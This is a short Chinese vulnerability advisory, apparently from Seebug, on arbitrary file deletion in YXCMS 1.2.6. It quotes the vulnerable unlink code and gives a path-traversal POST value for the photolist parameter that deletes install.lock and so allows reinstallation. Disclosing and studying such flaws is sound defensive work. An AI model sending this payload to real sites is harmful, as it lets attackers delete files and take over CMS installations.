YXCMS 1.2.6任意文件删除可Reinstall

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

### 简要描述: YXCMS 1.2.6任意文件删除 # Reinstall ### 详细说明: 前人经验: ``` http://wooyun.org/bugs/wooyun-2010-047226 ``` 产生漏洞文件: ``` protected\apps\admin\controller\photoController.php ``` ``` protected\apps\member\controller\photoController.php ``` 关键代码: ``` if(!empty($photos['photolist'])){ $phoarr=explode(',',$photos['photolist']); foreach ($phoarr as $vo){ if(file_exists($path.$vo)) @unlink($path.$vo); if(file_exists($path.'thumb_'.$vo)) @unlink($path.'thumb_'.$vo); } ``` 追踪: ``` $photos=model('photo')->find("id='$id'",'photolist,sort,extfield,account'); ``` photo表里的数据在新建图集或者编辑图集的时候插入数据库 ``` $_POST[‘photolist’] ``` 来源于用户数据 所以注册完用户,信息中心新建一个图集,然后删除图集,其中photolist参数POST传值修改为: ``` photolist%5B%5D=../../protected/apps/install/install.lock ``` 即可删除install.lock [<img src="https://images.seebug.org/upload/201411/0600130971b2b16db1d3c0e037a9b5c63b38a568.png" alt="64.png" width="600"...

0%

漏洞利用/PoC

暂无可用Exp或PoC

受影响的平台与产品

当前有0条受影响产品信息